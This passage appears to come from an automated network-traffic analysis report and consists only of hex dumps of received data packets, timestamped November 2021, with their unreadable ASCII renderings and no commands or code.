43 5e f7 f5 b6 1c e4 c5 96 fc ea 57 32 9b
                                                                                            Data Ascii: fXa.ZOQ$&s@n(,UGO$>pt-i7y]yhm'7](`^>2vhE\\\4Dc:XmwH%Tjy@UwGtI|$6$7'>}b[a"<!G<GGR*IaoY[|k3C^W2
                                                                                            2021-11-22 18:40:22 UTC95INData Raw: 8d 40 25 d3 bc b8 a4 8d cc c4 cb b4 eb 08 83 30 6e 17 30 46 41 1c 13 59 44 98 32 b3 ec 31 d7 56 ef 79 4e e4 60 5d 4c 2e bd 7b 8e 86 7e ba b1 31 92 c2 51 c3 cb f7 f6 84 e5 3b 12 f4 09 b2 e8 84 5b 0a f2 55 cb 45 89 f5 52 a5 8f 86 e3 12 84 eb 5a 95 80 77 e8 2e 2c a1 74 c7 22 f2 a0 ca 70 2e b7 90 7a 8c d8 18 6f 2c 6d 67 8e 76 31 10 16 d2 37 ff 59 5c 5b 82 17 55 8b 1b f0 32 de c4 68 75 35 71 aa 05 7c f7 59 87 34 fa 90 50 b3 22 0c fe 28 ca 57 7a fc 7d 8e ba 2e f8 a3 b2 d8 44 7c 9a 3b fc 08 07 ce 37 e2 0d db 8e 4c 17 09 97 d8 b0 73 be 5d 25 44 d7 47 95 3a 8e 14 a9 26 ed 9b 0c 9c c8 4c f7 a9 59 43 6b 18 60 06 14 7b 46 44 2b 14 7b 6e 23 09 19 8f 32 53 a1 1d 75 84 36 03 98 46 72 52 90 c2 d4 7f b1 cf b9 c7 95 7e fb c2 78 37 0c 06 32 6b f2 fd 49 1a 6e 44 ed 93 e0 e4
                                                                                            Data Ascii: @%0n0FAYD21VyN`]L.{~1Q;[UERZw.,t"p.zo,mgv17Y\[U2hu5q|Y4P"(Wz}.D|;7Ls]%DG:&LYCk`{FD+{n#2Su6FrR~x72kInD
                                                                                            2021-11-22 18:40:22 UTC96INData Raw: b4 20 db 7b fc 9b a3 a4 13 d6 34 ee 41 41 6b 52 b7 c8 18 62 79 af 2c f3 fe b5 85 8d 58 97 40 e8 28 67 cb 89 74 33 6e 99 bc 28 d2 a6 42 d2 34 97 bd ef d2 33 ca a8 57 04 c4 51 ca f3 0d 04 04 1b 1f c0 5a 56 63 d3 d8 8d a5 5d 59 b3 93 92 d0 3c 08 a7 e1 68 fd ed b8 7f 69 a3 0b 53 f6 88 27 f8 3e 80 5f 84 38 86 11 01 5d ea 3f 6c 35 65 cc b0 39 91 eb 7a fe 1b 11 cd 84 b7 30 69 de 84 ec 08 cc 35 23 14 cb ca 09 02 75 f8 10 ba e6 6c 24 ab 36 1f 6a b3 be 68 23 71 c3 96 0b a8 6c 7a 5c ed 99 1c b8 60 b8 f4 96 f3 63 a1 e4 8b e1 c4 73 35 c3 96 81 2f 72 27 3f 50 ea 53 68 8c 7a 9c 18 b5 cf 5b 72 c4 b0 16 8d 34 b4 41 c1 d0 d2 e5 9d af 5e 91 20 62 c9 55 a5 7c 3a d4 8f df b6 47 e3 64 fd 1f 6d 0a cc 82 4d 0d 6b 8a bc 08 c9 59 58 9b 1e 77 06 38 7a 02 aa f6 80 3e 52 a8 64 27 e5
                                                                                            Data Ascii: {4AAkRby,X@(gt3n(B43WQZVc]Y<hiS'>_8]?l5e9z0i5#ul$6jh#qlz\`cs5/r'?PShz[r4A^ bU|:GdmMkYXw8z>Rd'
                                                                                            2021-11-22 18:40:22 UTC97INData Raw: 76 69 d5 cf c0 74 74 8b fa 97 13 83 35 3e a7 cf ee a0 f8 d2 b0 d2 da cb 65 95 42 6a 63 27 0f 15 79 3a 2a 25 ce 27 c6 e1 45 cc 33 df 30 5f 81 6b 5d 2d 2e c8 2d 83 f3 66 ce ab 43 bb a7 3e c3 ac be 9f ea 8b 4f 32 91 4d c0 89 ea 2f 6f 93 21 cb 65 89 b0 0e dd c2 f6 8a 7e e7 84 28 e7 ef 12 9b 5c 43 a1 12 97 56 80 fc a5 35 48 d3 f9 1d e0 bd 7d 33 2c 38 01 fd 1f 54 62 64 b7 17 99 1d 33 3a fa 63 7b ea 7e ac 4a 92 a1 07 75 56 2d cb 63 10 9e 79 f5 67 9f e4 36 d2 4d 78 86 4d e4 57 1f fc 05 8e df 72 f8 ee b2 b1 18 1f d7 49 93 67 7d bd 5e 8d 61 bd e2 38 76 55 cb 9d f6 17 d7 3a 57 21 b2 1b f3 6f e1 67 d1 43 b1 e9 0c bc b8 08 85 c8 36 37 0d 79 09 5a 78 3f 23 21 58 72 55 0f 4a 7c 77 e3 5b 27 a1 41 75 c8 6a 6c f4 21 1d 3b f7 ac bd 5f df 8b ca a6 bb 0a 91 a3 0b 37 63 06 5c
                                                                                            Data Ascii: vitt5>eBjc'y:*%'E30_k]-.-fC>O2M/o!e~(\CV5H}3,8Tbd3:c{~JuV-cyg6MxMWrIg}^a8vU:W!ogC67yZx?#!XrUJ|w['Aujl!;_7c\
                                                                                            2021-11-22 18:40:22 UTC98INData Raw: 05 51 99 c3 82 75 42 e6 b8 6e a2 3d 41 89 7d cc 3d f1 6c f3 82 38 5c 0b 8b 35 64 aa 58 68 42 02 ea 6b 0a 61 e0 a4 04 df 00 24 62 6e e5 81 c0 ac 42 2b be 3d 08 3e b3 54 5f 60 f8 a7 5c ef b8 e3 db 8b a1 67 9a c4 dd c0 61 6d 3f 6e a4 b2 ef 19 05 0c 20 c2 f5 7d 11 a4 52 86 3f 56 be 67 00 b7 8a f5 da 91 2a b1 00 bc 44 f6 c5 8f b4 36 34 9f 1f 05 64 ee 51 9a 16 4f 94 72 37 97 d2 79 07 4a 7f 64 19 2c 27 01 e6 ce 5f 20 7c a0 cf b4 58 18 8b 89 99 45 be 40 02 d3 bd b8 ae 8d d8 c4 fe b4 d2 08 95 30 78 17 1e 46 2e 1c 22 59 51 98 2a b3 e2 31 e4 56 c0 79 77 e4 3f 5d 1e 2e ff 7b d7 86 49 ba ab 31 98 c2 0e c3 98 f7 ae 84 b8 3b 03 f4 7c b2 b8 84 4b 0a a0 55 89 45 b1 f5 36 a5 83 86 ba 12 d7 eb 19 95 df 77 af 2e 01 a1 20 c7 17 f2 ca ca 03 2e e4 90 2b 8c bd 18 33 2c 38 67 fd
                                                                                            Data Ascii: QuBn=A}=l8\5dXhBka$bnB+=>T_`\gam?n }R?Vg*D64dQOr7yJd,'_ |XE@0xF."YQ*1Vyw?].{I1;|KUE6w. .+3,8g
                                                                                            2021-11-22 18:40:22 UTC99INData Raw: 8f f3 22 1b 1f ef 00 de bb 7f 6f a2 3e 24 65 80 41 46 1b f2 ea ec cb 63 72 c1 4d ec ca b2 89 0d 28 b3 ec d1 ae 28 f0 c3 36 6c ef fc 84 99 2a 09 2a d2 96 c0 41 29 a9 cb 4b 34 41 e8 7c b6 29 85 3d 52 e1 b2 c1 29 13 da 4c af 6c 26 be bb 65 79 02 39 8c cd 37 2b 85 dc 84 d5 0f 79 13 4d 6a 99 6a c2 72 84 5b 65 cc 66 46 92 c9 9f b9 4c dd 23 f7 9c f2 31 63 96 13 72 1c d8 90 cf 88 3c 61 42 e9 53 4a e5 3f d5 2b 16 ff ec 4e bc 8b 4f 4a 4c b1 4b 9f 7b 8e 20 97 7b a6 9b c0 a4 1e d6 7c ee 73 41 2a 52 c4 c8 00 62 16 af 4f f3 c3 b5 a8 8d 08 97 63 e8 18 67 cb 89 74 33 6a 99 e0 28 9e a6 2d d2 57 97 80 ef e8 33 ff a8 66 04 ca 51 c9 f3 0e 04 01 1b 26 c0 0f 56 4c d3 fc 8d a7 5d 09 b3 93 92 d0 3c 08 a7 e1 68 fd ed b0 7f 63 a3 0e 53 f6 88 3e f8 0e 80 6c 84 0b 86 32 01 55 ea 34
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                                                                                            2021-11-22 18:40:22 UTC100INData Raw: dc 1c 7a 55 15 e7 ed 18 34 9b 6b 6a 23 f2 a6 de 1b 7b 92 8b 2d 95 52 74 e7 3e b8 7b 83 2a 9c b2 54 68 58 ba 50 57 de 69 34 73 51 db 0e 6e 13 d3 d2 46 b6 38 47 5a 0b a4 f2 f0 f0 72 7f 8f 58 38 4c 87 39 1d 33 ca c2 1d 9d 8e 95 ed e2 96 04 ac a1 dd c0 32 24 50 03 c2 d3 9b 7e 72 69 41 92 87 1c 74 d0 0e ee 72 56 d7 14 63 c1 f8 96 b5 f9 59 de 6f cf 22 82 b1 a1 e8 53 7b e7 79 60 02 ee 38 e9 75 39 f1 11 6b ff e3 16 32 39 51 10 29 02 7b 64 a9 b6 2a 45 08 80 a3 99 37 73 e4 89 f2 45 e2 03 52 b6 cf ca c1 f9 be 94 97 c6 be 67 f0 40 0b 44 42 30 61 7f 57 59 25 cb 46 d6 8d 42 8b 25 ab 10 2b 8b 06 33 2d 6b c8 15 e2 f0 0a ba ed 31 de 91 3e a6 ac 85 9f f2 8b 52 32 97 4d d7 89 f7 2f 4b 93 36 cb 31 89 9c 0e d3 c2 e3 8a 12 e7 eb 28 c6 ef 2e 9b 7d 43 f5 12 82 56 bf fc 96 35 6d
                                                                                            Data Ascii: zU4kj#{-Rt>{*ThXPWi4sQnF8GZrX8L932$P~riAtrVcYo"S{y`8u9k29Q){d*E7sERg@DB0aWY%FB%+3-k1>R2M/K61(.}CV5m
                                                                                            2021-11-22 18:40:22 UTC102INData Raw: 03 f8 1d c4 ea 32 de 6f 4e e5 68 ad 87 5f 7e 1f 9d 00 b3 ff 5c 2e 80 77 52 65 ae 53 06 1b 9e ae 9d cb 63 72 84 4d 94 ca f2 89 61 28 f2 ec a3 dc 4d 85 b1 52 42 9f 99 84 e1 2a 6c 76 d2 df c0 02 7d e8 8a 08 67 0d a3 2f db 07 e2 58 20 99 9c a4 4c 13 a2 10 ca 14 26 dd eb 0a 0b 72 56 f5 ae 19 4e e0 af fc a6 6a 31 13 2c 6a fa 4a a9 50 e1 5b 17 cc 48 64 f7 e9 e7 96 29 9a 23 a5 ee b3 54 2d f1 47 17 26 bc e2 a6 a8 48 4b 6c ba 36 67 9d 0e b0 06 16 ce ec 63 bc bb 4f 70 4c 99 4b d0 7b c7 4e be 0f 8e ff 83 c8 57 ba 55 c0 35 25 0a 3e eb a4 54 62 16 e3 2b 81 d8 d0 9d dd 0a f8 70 8d 38 12 d8 ec 41 57 6f eb d9 5b a1 a6 42 80 40 fb af 9b d7 47 c2 dc 54 77 f1 3e e2 9c 1a 41 1f 69 2c b2 0f 56 10 81 c9 e1 84 38 0d ff b6 e1 c5 6b 15 c9 b3 5a e4 9f 8e 10 7e a3 6d 53 97 c6 26 b9
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                                                                                            2021-11-22 18:40:22 UTC103INData Raw: 32 da 77 78 0b 48 5a e2 f7 1a a0 99 75 37 36 49 95 ae 77 41 e8 19 05 51 94 c3 aa 75 27 e6 dc 6e fc 3d 1a 89 5a cc 14 f1 5d f3 c1 38 48 0b f4 35 03 aa 35 68 30 02 ae 6b 1c 61 a1 a4 23 df 56 24 2e 6e f2 81 95 ac 00 2b fc 3d 51 3e e8 54 73 60 96 a7 4a ef e7 e3 83 8b f2 67 c3 c4 aa c0 41 6d 50 6e c2 b2 c7 19 02 0c 33 c2 e8 7d 13 a4 7c 86 13 56 ba 67 10 b7 d6 f5 d7 91 38 b1 1b bc 22 f6 d7 8f 87 36 09 9f 59 05 2d ee 7e 9a 55 4f d3 72 1e 97 90 79 57 4a 33 64 48 2c 18 01 c2 ce 5b 20 28 a0 d7 b4 58 18 8f 89 97 45 8c 40 21 d3 f2 b8 eb 8d 9c c4 b7 b4 9b 08 d5 30 4a 17 62 46 08 1c 39 59 05 98 6e b3 af 31 8b 56 ab 79 11 e4 75 5d 59 2e a9 7b 90 86 7e ba ed 31 de c2 1c c3 85 f7 bf 84 ef 3b 5d f4 6d b2 ac 84 0a 0a d2 55 cb 45 b3 f5 4f a5 b2 86 fa 12 8b eb 41 95 8c 77 fa
                                                                                            Data Ascii: 2wxHZu76IwAQu'n=Z]8H55h0ka#V$.n+=Q>Ts`JgAmPn3}|Vg8"6Y-~UOryWJ3dH,[ (XE@!0JbF9Yn1Vyu]Y.{~1;]mUEOAw
                                                                                            2021-11-22 18:40:22 UTC104INData Raw: c9 76 4d bc 7d 78 cf 5c e4 ff f9 76 f8 6e c4 8f 6e ac 2e 3d 95 68 dd f3 1b 1b 7e ef 74 de 9e 2f 72 f2 3b 24 0a 80 30 62 7a f2 c2 f1 97 63 35 e1 22 ec a5 82 ee 0d 44 9d 89 d1 80 28 c6 c3 3a 6c ed fc eb 99 47 09 13 d2 83 c0 57 29 9b cb 6d 34 7f e8 0f b6 43 85 39 52 ed b2 c5 29 13 da 10 af 48 26 9c bb 7a 79 02 39 b1 cd 78 2b 94 dc 9d d5 36 79 5f 4d 05 99 29 c2 31 84 37 65 90 66 23 92 86 9f f9 4c fd 23 c9 9c d6 31 6f 96 26 72 45 d8 89 cf dd 3c 3b 42 ba 53 1f e5 6d d5 69 16 be ec 1a bc 95 4f 15 4c e1 4b b5 7b e7 20 91 7b c6 9b a3 a4 78 d6 0c ee 15 41 25 52 ae c8 74 62 39 af 0c f3 bf b5 e9 8d 78 97 33 c5 71 09 c5 a4 73 52 65 fd de 47 aa 86 6f ff 55 fb 8d 80 f3 1e cd c7 0c 77 c4 3f c2 91 06 7c 40 71 2c a2 2f 7b 3d b7 d4 fe b6 3f 15 d6 fa a1 d5 11 1d d7 e9 1b 81
                                                                                            Data Ascii: vM}x\vnn.=h~t/r;$0bzc5"D(:lGW)m4C9R)H&zy9x+6y_M)17ef#L#1o&rE<;BSmiOLK{ {xA%Rtb9x3qsReGoUw?|@q,/{=?
                                                                                            2021-11-22 18:40:22 UTC106INData Raw: b1 f3 56 64 8a b6 a9 fb af 56 96 45 2d 16 78 79 66 4b 87 d3 6e c9 fd 75 37 55 49 e7 5a 0a 41 9b e0 26 50 f2 ed aa 10 03 92 af 03 fb 3d 74 89 3e 21 24 f0 2a 79 b2 38 68 25 ce 50 2f de 4d 11 17 02 db 6b 6e 61 a3 a5 46 4f 3b 24 5a 40 cd e5 91 d8 13 0f ba 3d 38 3e 87 c4 6e 61 ca 1b 28 ef 8e cd 9f ef f7 13 cd c4 dd 8c 9b 6c 50 56 c3 b2 9b 37 00 68 20 b6 e6 59 0e de 74 e2 10 31 d7 67 63 33 52 f4 b5 89 58 b1 6f 92 4b 92 d0 fb 89 12 49 9f 79 05 02 72 93 9b 75 5b f1 72 6b b9 8a 1d 53 3e 30 40 1a 2c 7b 01 a9 7e 81 21 08 30 a0 b4 37 36 8d ed 93 31 83 64 66 d3 cf b8 c1 cd 11 c5 97 88 b1 08 f0 1e 62 73 23 32 00 38 61 59 25 98 46 b3 4d 30 8b 52 ab 79 2b ca 45 0f 79 0a 90 38 a3 86 0a ba ed 35 1e c3 3e ef ac f7 9f aa c8 69 66 d0 15 f1 dc 84 2f 0a 93 65 0b 44 89 e5 0e a5
                                                                                            Data Ascii: VdVE-xyfKnu7UIZA&P=t>!$*y8h%P/MknaFO;$Z@=8>na(lPV7h Yt1gc3RXoKIyru[rkS>0@,{~!0761dfbs#28aY%FM0Ry+Ey85>if/eD
                                                                                            2021-11-22 18:40:22 UTC107INData Raw: c7 55 d1 e0 62 d3 99 19 ee 95 f9 e7 e8 90 bd 05 f4 12 5d e4 85 41 77 f8 06 7c 8e 32 e2 d7 3c e5 52 15 f2 5f af a8 ee 00 c2 47 2e 2e f8 cf 25 65 7c e4 63 1b 1a 19 f0 cb b1 c5 e0 4d 2c 7d 83 89 23 90 9c ec 79 6b 29 85 c3 52 6c 9f 6c 38 98 2a 1c 76 d2 5f 5e be 28 e8 c2 08 34 8d f8 2f b6 87 81 58 52 19 a5 a4 29 93 c9 10 af 94 55 dd bb 8a 6f 72 39 75 ce 19 2b 60 a8 fc d5 ea d7 af 4c 6a ad 4a c2 d0 8f 5b 65 4c 66 64 92 e9 1d 39 4d 9a 63 0a 9d b3 5f 82 97 47 22 89 d9 e2 cf a8 3c 4b 86 15 52 67 05 a1 d4 06 ba 61 ed 63 bc bb 4f 70 8a 25 4a d0 79 7a 21 be ad 32 9a 83 4e eb d7 55 fa 88 40 0a 52 eb c8 54 0c aa ae 4f f3 9f b5 e9 8a 78 d5 50 9a 25 17 de cd 65 50 79 e0 cc 5c d2 82 42 90 77 e5 98 9f f0 7c d3 cd 4f 45 c9 36 c9 81 00 70 05 76 13 b2 60 20 79 b7 d8 ff d7 6c
                                                                                            Data Ascii: Ub]Aw|2<R_G..%e|cM,}#yk)Rll8*v_^(4/XR)Uor9u+`LjJ[eLfd9Mc_G"<KRgacOp%Jyz!2NU@RTOxP%ePy\Bw|OE6pv` yl
                                                                                            2021-11-22 18:40:22 UTC108INData Raw: 5a c6 77 70 84 81 5b 71 94 85 af fe f3 56 5a 97 da cc ba 52 f4 94 02 b6 79 1a 18 24 7e 8e c7 75 8e 99 a3 36 12 2c 93 ed 6d 33 e9 7c 04 25 b6 aa ac 10 18 92 e4 1c ec 6a 74 89 73 c8 28 94 5e b0 c7 4a 1a 6e d4 41 13 c3 1b 0d 10 76 b4 19 17 36 d3 a4 b6 de 7f 41 2e 28 cd ed 95 ff 1b 51 ea 3d 5a 3f c1 26 78 05 86 ce 7f 9d ef 91 94 8b c7 63 ff a1 a9 84 5e 01 14 07 b0 d7 f8 6d 1d 7e 38 95 87 7d 85 a5 49 e3 06 10 be 0b 06 e4 91 8f d0 d4 21 b1 2b bf 6e 99 d2 ee 84 77 17 f3 16 66 02 ee 70 99 39 20 92 13 07 d1 91 1c 57 4a a8 60 7e 4d 12 75 ef a1 58 73 61 ce c4 d8 52 57 86 e3 97 26 96 40 fa d3 8c ca a4 ec ca a1 c7 c6 d1 6b 95 43 78 40 42 46 8e 18 01 30 57 ec 33 d2 e1 61 f9 39 df 1c 48 90 06 5d 4b 2a 9b 1e 96 c0 63 d6 88 61 b1 ab 50 b7 c9 85 9f 84 48 38 60 91 2c d6 d9
                                                                                            Data Ascii: Zwp[qVZRy$~u6,m3|%jts(^JnAv6A.(Q=Z?&xc^m~8}I!+nwfp9 WJ`~MuXsaRW&@kCx@BF0W3a9H]K*caPH8`,
                                                                                            2021-11-22 18:40:22 UTC109INData Raw: 2a 52 6b 6f 41 1f 97 8f 0a 2a 0f 62 9e 87 e0 a6 6c 99 5e 3b 59 b9 94 0f 46 df 4e 1d d3 0f 90 9e 8d 13 f8 6e d8 8f 71 cd 03 51 ab 0d d5 87 17 74 70 84 45 a6 ff 2f 40 f2 34 56 00 e1 27 07 4c 9b c0 95 a4 14 37 99 1a ec 64 82 cd 64 5b ed 8d a5 bf 40 c8 a6 21 1f fe 9b e1 d8 2a 09 2f d3 98 a5 76 64 8d b8 7b 55 6a 8d 6e b6 3a 84 1f 37 ed f9 c1 50 40 ae 71 db 71 26 f3 bb 49 11 13 4b b9 a2 6e 4e 92 8b fc d5 34 79 50 3f 0f f8 3e a7 14 e1 28 0e b8 09 14 c5 e9 9f c3 1f df 71 96 ae 9d 55 41 fa 47 72 48 da b0 aa cf 6d 3e 27 c8 2a 31 84 62 a0 63 53 b6 bb 63 bc da 4d 22 29 fe 04 a0 1e a9 6b db 02 cb e3 d4 a4 37 d4 07 8b 52 0e 7a 37 85 83 31 1b 53 d7 0e f3 d0 b7 bb e8 1f d2 7d 9d 31 2c cf f0 45 4b 5c 99 d1 2a 80 c3 25 83 41 f2 93 96 d2 52 cf dd 44 41 dd 10 a6 f3 01 06 3f
                                                                                            Data Ascii: *RkoA*bl^;YFNnqQtpE/@4V'L7dd[@!*/vd{Ujn:7P@qq&IKnN4yP?>(qUAGrHm>'*1bcScM")k7Rz71S}1,EK\*%ARDA?
                                                                                            2021-11-22 18:40:22 UTC111INData Raw: c8 25 3b 34 79 58 4b a4 92 a8 52 33 0f 10 69 e1 f5 9f 1e b4 96 a6 d8 f5 5c 69 8e f7 cd 9f 1f 22 fb 27 bf 64 0b 79 b2 3f ac ce 6e b8 ea 79 45 14 2d 83 ae 18 0f de 4d 2b 01 bb f0 ec 5b 1f 8a e7 6e 95 72 38 cc 7f 99 2f c2 18 dd d6 54 04 0b ba ed 57 e9 1b 11 03 76 88 1f 1c 08 bd c3 12 b0 7a 4d 34 0f d6 f8 b1 ac 72 f0 8f 7e 4a 47 f7 20 48 0e ba d5 72 9b eb 80 99 cf f7 13 cd c4 dd 19 32 2e 22 17 b2 c6 c8 6d 00 65 2f a5 d3 12 36 cd 60 e7 00 2f 80 67 63 f4 aa ac e5 c5 6a 83 41 d8 4e 9a b1 9f e8 71 1e eb 34 6a 66 9b 54 ff 33 26 9d 17 25 f6 8e 1c 77 32 06 64 29 7c 28 40 f9 87 04 64 44 ec a3 b4 37 18 e4 89 f2 45 e2 40 52 d3 cf b8 c1 8d be c4 97 b4 be 08 f0 30 0b 17 42 46 61 1c 57 59 25 98 46 b3 8d 31 8b 56 ab 79 2b e4 06 5d 2d 2e c8 7b e2 86 0a ba ed 31 de c2 3e c3
                                                                                            Data Ascii: %;4yXKR3i\i"'dy?nyE-M+[nr8/TWvzM4r~JG Hr2."me/6`/gcjANq4jfT3&%w2d)|(@dD7E@R0BFaWY%F1Vy+]-.{1>
                                                                                            2021-11-22 18:40:22 UTC112INData Raw: 48 24 17 32 67 89 61 d1 2e db a3 78 37 0c ee 37 6b f2 fd 01 cf 9a 4f 2e 98 6b 62 2f 11 51 7e 61 71 a7 6e a1 ec 15 2b ff 0a b3 be ad 37 ad 2f 92 ce 65 e4 ec d1 9d eb cd fb 5f 53 94 06 b9 92 88 09 29 b6 fc de 56 5b bb c6 1f f2 ae 48 82 94 70 99 01 67 22 6a 1e 09 28 9d 55 89 78 7b 60 8b db 28 bb dc 6c 11 2e 09 76 6b cf 21 88 ea a0 40 f8 dc 76 ec 2f b6 be 2a e9 0e 0d fa 2d 6d 37 ea f8 c3 10 26 dd 02 39 79 ec ac bd 44 5d 0f c8 90 77 35 82 23 17 4d 6a d1 29 bf 6c c8 d0 b5 84 65 99 13 d6 cf d3 4c 9a 57 a2 af 73 d8 00 92 47 72 9e bc 64 cf a8 5a 72 05 be 26 89 a4 b0 d4 06 16 ce a8 e7 cb 83 3a 92 43 2e 0c d6 74 70 6f aa 3f 05 d4 bb 21 97 a2 79 a6 b8 16 2e 16 60 08 1c 61 c7 24 05 f7 1a 7c 9c 8a f3 95 5a eb 9d 8c ae 02 02 30 ca d1 87 eb 9a a9 05 0a 7c 14 23 c7 c9 18
                                                                                            Data Ascii: H$2ga.x77kO.kb/Q~aqn+7/e_S)V[Hpg"j(Ux{`(l.vk!@v/*-m7&9yD]w5#Mj)leLWsGrdZr&:C.tpo?!y.`a$|Z0|#
                                                                                            2021-11-22 18:40:22 UTC113INData Raw: 6d 8d ae b9 04 8a d2 49 9a 49 4c c3 24 14 23 04 3b d0 c7 7d cd cd 3c d7 14 03 c6 0a 4f 71 5f f7 ca 9f 02 e8 68 2a fe 22 ff 76 0f 57 ad ca 52 77 ce 98 7a 67 79 6e cc d1 97 7b 71 41 a2 25 c2 4e 25 18 ab 9b ff 43 e7 14 07 e5 08 ac 75 3e a4 c1 c1 0d 32 72 c1 f2 c7 df 25 86 ae 2d 64 63 28 e3 09 22 92 68 96 20 ea ee 5e a9 b7 af 45 2b 97 5a b9 af aa 63 02 42 3c 31 39 57 55 9f 09 e6 dc 24 83 a7 ee 53 16 1c 53 c4 a8 2d 73 e0 54 7d f9 74 ef 14 8d cd 00 f9 cd 65 06 75 e7 dd 8d a9 28 26 e8 f5 dc f6 7c d8 5a 71 60 0b 36 f7 f0 04 a2 2a 32 9c b1 8e 06 7f 71 99 b5 a4 f3 41 ab df 68 25 16 6a 19 ef 5d 08 53 49 2a 0a 3a 7f cb ed f9 24 37 1b e4 89 f2 41 e2 40 52 2c 30 b8 c1 35 be c4 97 b4 be 08 f0 70 0b 17 42 46 61 1c 57 59 25 98 46 b3 8d 31 8b 56 ab 79 2b e4 06 5d 2d 2e c8
                                                                                            Data Ascii: mIIL$#;}<Oq_h*"vWRwzgyn{qA%N%Cu>2r%-dc("h ^E+ZcB<19WU$SS-sT}teu(&|Zq`6*2qAh%j]SI*:$7A@R,05pBFaWY%F1Vy+]-.
                                                                                            2021-11-22 18:40:22 UTC114INData Raw: 53 97 a8 52 f8 52 86 2b 84 64 92 5d 01 32 ea 58 6c 5c 65 a2 b0 19 91 af 7a df 1b 65 8d cb d3 51 1d bf 84 ec 08 a8 35 60 14 a4 fa 64 02 1a f8 74 ba 89 6c 78 ab 72 1f 18 b3 df 68 44 71 ac 96 65 a8 70 7a 09 2d c4 6c b9 01 be 95 b6 f3 4b a1 85 8b 95 84 12 35 9f 94 cd 2f 1d 3d 5c 50 8b 53 04 8c 5a 9c 4b b5 bb 5b 13 c4 84 16 e8 74 9a 33 b2 a2 b1 e5 9d af e2 90 63 62 a6 05 c8 7c 55 d6 eb df d9 5b bf 64 b9 1f 1f 0a ad 82 2a 0d 04 8a d2 08 d5 59 0d db 6d 77 63 38 08 02 8a f6 c4 3e 33 a8 10 27 84 81 d3 71 d7 f7 ca 9f 87 33 1c fe b6 a9 fb 52 47 96 45 da 16 78 79 48 3f e2 ab 1a ed 99 1c 37 55 49 e7 ae 18 41 9b 19 6a 51 f2 c3 de 75 7b e6 8b 6e 95 3d 74 89 3e cc 7b f1 2a f3 b2 38 68 0b ba 35 57 aa 69 68 73 02 db 6b 6e 61 d3 a4 46 df 38 24 5a 6e a4 81 f0 ac 72 2b 8f 3d
                                                                                            Data Ascii: SRR+d]2Xl\ezeQ5`dtlxrhDqepz-lK5/=\PSZK[t3cb|U[d*Ymwc8>3'q3RGExyH?7UIAjQu{n=t>{*8h5WihsknaF8$Znr+=
                                                                                            2021-11-22 18:40:22 UTC115INData Raw: 20 94 ef 77 d3 a7 07 85 5a 4c d2 d6 04 ca 35 2e 93 18 69 a8 fd 91 77 08 00 ec 79 52 a4 10 64 d2 9e bb 39 6c 72 09 e7 71 0a 1b ac 32 da 4d 7b 51 7e 39 42 41 34 d7 86 92 d6 e6 e4 50 5b 66 5c 9e c8 0a 58 f2 84 7e 8e ba 3e 9b 7a 96 49 44 1f 9a 08 7f 9d 21 b2 b0 eb 0e bd 8e 70 ad 5b 87 9d b0 77 be 3a 25 6d d8 b8 47 60 0d 35 aa 43 ed ac 3f 4a 80 83 28 88 dd c1 64 fd 00 5b 14 3f 07 aa f9 3a f0 c0 cb 61 e7 1c cd 66 2a 93 3d 41 b2 48 18 21 72 3b dc 27 24 b7 1b 75 46 59 d4 ba fa c5 f1 73 28 7e 7a e6 a6 d9 31 0e e3 5d c9 b8 1f b3 19 94 19 5e 61 73 a3 52 58 f4 88 45 38 50 e4 ff ca a4 b4 45 03 1f 3d 1a 6b 07 ad e5 a1 c9 1e 23 1b e7 75 ce b7 d0 ec ba f4 de 61 fc ba d9 1a f2 ae f1 20 61 41 3a 05 61 86 a6 e1 f2 3d a0 e0 d1 dc ad 5e cc d6 a8 9d fc 84 96 9c 8d 52 c2 de c0
                                                                                            Data Ascii: wZL5.iwyRd9lrq2M{Q~9BA4P[f\X~>zID!p[w:%mG`5C?J(d[?:af*=AH!r;'$uFYs(~z1]^asRXE8PE=k#ua aA:a=^R
                                                                                            2021-11-22 18:40:22 UTC116INData Raw: 7d a6 81 69 a1 ec fd 7e 0d a2 6c 52 96 89 53 f9 53 81 2a 85 65 87 5c 00 33 eb 59 6d 5d 65 a2 7c d5 5d 63 b6 53 d7 a9 01 29 7b fc a5 12 cc 65 54 b4 3d 28 9d c8 ee 74 54 4d b9 22 f2 0a 80 48 e3 f9 5b 3c cb 96 e3 b5 39 25 d2 41 80 71 f1 d1 66 ae 38 ad 28 41 0e 3f b7 03 81 cd 00 7c 3b 07 57 88 96 cd 6b 96 d7 df ab 89 5c 81 57 5a 9c 4b d3 38 64 13 cb 40 c7 e8 34 b4 c2 bf d8 d2 ea 19 68 02 91 63 2a 2d 1a c0 1a d6 ed a7 d0 5c fe bf 64 b9 79 9c 73 af ed 25 88 aa 8a d2 08 f3 da 74 9f 0c 78 e6 9b 08 02 8a 90 47 47 35 cc 1f a2 1c 81 d3 71 9f 7a 8e bb e7 00 e3 bb 85 60 72 2e 63 f6 00 e9 d6 30 f0 0c 1b c2 26 49 ec d1 97 fa aa 5c f6 b9 18 41 a6 3a 6a 51 32 b6 b1 fe 3f c2 eb 2a 18 76 76 8a fd ff b2 7a fa b2 0a 38 58 0b ba bc 13 8e 09 97 66 d6 dd 6b 6e 25 58 e8 62 bf b5
                                                                                            Data Ascii: }i~lRSS*e\3Ym]e|]cS){eT=(tTM"H[<9%Aqf8(A?|;Wk\WZK8d@4hc*-\dys%txGG5qz`r.c0&I\A:jQ2?*vvz8Xfkn%Xb
                                                                                            2021-11-22 18:40:22 UTC118INData Raw: 45 c1 78 1b d8 37 79 75 5a 6c 20 60 1c ea c4 89 2e 43 ed 9f 87 4f be 75 cf 95 3c d3 90 f5 bf 41 e7 cc 64 b5 72 21 75 54 10 2c 59 d8 00 08 ff 38 82 63 ef f3 1b ac 32 d3 7c 07 65 56 71 f8 cc 58 7c a1 c3 ea b0 c3 af c7 4b 7a fe 4d 82 da 6f 3e 87 71 45 3a 73 25 fa 38 41 57 88 49 fc 2b 8a fd 2e c1 84 b8 cb 2a 17 55 7f 75 4b e8 41 72 a8 34 76 18 95 6f c6 ec 66 bc f8 b1 0e bc c8 40 7c 94 7d 07 23 f0 65 1e 06 3f 46 12 eb 3a f8 cb 03 23 da 2f fe eb 6d 09 f6 24 0e ef 62 20 07 24 a3 6c 98 d2 b4 35 47 59 6a 42 72 e7 5c 1f 49 35 fb 58 20 74 0d 62 4e 22 24 2f f5 b6 69 98 19 e6 2c f8 e7 76 60 3f c1 40 69 90 28 33 35 ba 34 a2 08 43 fe 60 a3 f1 29 a4 61 3f 93 d7 d3 89 66 d1 e0 ab 2e f2 77 24 65 c8 d0 8e 0b be 27 e5 ef 2f fb bd 69 e4 87 